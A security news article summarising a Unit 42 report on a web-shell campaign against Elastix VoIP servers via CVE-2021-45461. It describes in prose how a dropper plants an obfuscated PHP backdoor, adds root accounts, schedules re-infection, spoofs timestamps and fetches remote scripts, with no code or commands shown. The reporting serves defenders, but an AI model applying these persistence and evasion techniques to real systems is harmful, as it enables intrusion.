- The attacks are expected to be correlated to an RCE vulnerability with a CVSS score of 9.8.
- The attacker’s IPv4 address reveals an association with adult-themed Russian websites.
- There are two groups using different versions of the attack script.
Security researchers at Palo Alto Networks‘ Unit 42 announced that hackers have launched a new campaign that targets Elastix VoIP telephony servers, which is a server software for unified communication used in Digium phones. The team stated that they have witnessed more than 500,000 unique malware samples between December 2021 and March 2022. The attackers are implanting a web shell, which can be correlated to the remote code execution vulnerability CVE-2021-45461, which has a CVSS score of 9.8.
Two attack scripts
Unit42 team stated that they categorize our original sample set into two main groups, Group 1 and Group 2. Also, Group 2 was subdivided into two subgroups, Group A and Group B. Group 1 and Group 2 are using different versions of the attack script. The subgroups A and B indicate two different clusters of targets.
The initial dropper is a shell script with two main objectives, install the obfuscated PHP backdoor in multiple locations in the file system and maintain access by creating several root user accounts or setting up a scheduled task to re-infect the host system. This dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to that of a known file already on the system.
It also fetches and executes remote scripts from the attackers. The attacker’s IPv4 address is located in the Netherlands but its past DNS records reveal an association to mostly adult-themed Russian domains. Unit42 said,
« The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors. The only way to catch advanced intrusions is a defense-in-depth strategy. Only by orchestrating multiple security appliances and applications in a single pane can defenders detect these attacks. Aside from the numerous protections offered across the Palo Alto Networks product suite, WildFire, Advanced URL Filtering and Threat Prevention provide coverage for this family of samples. »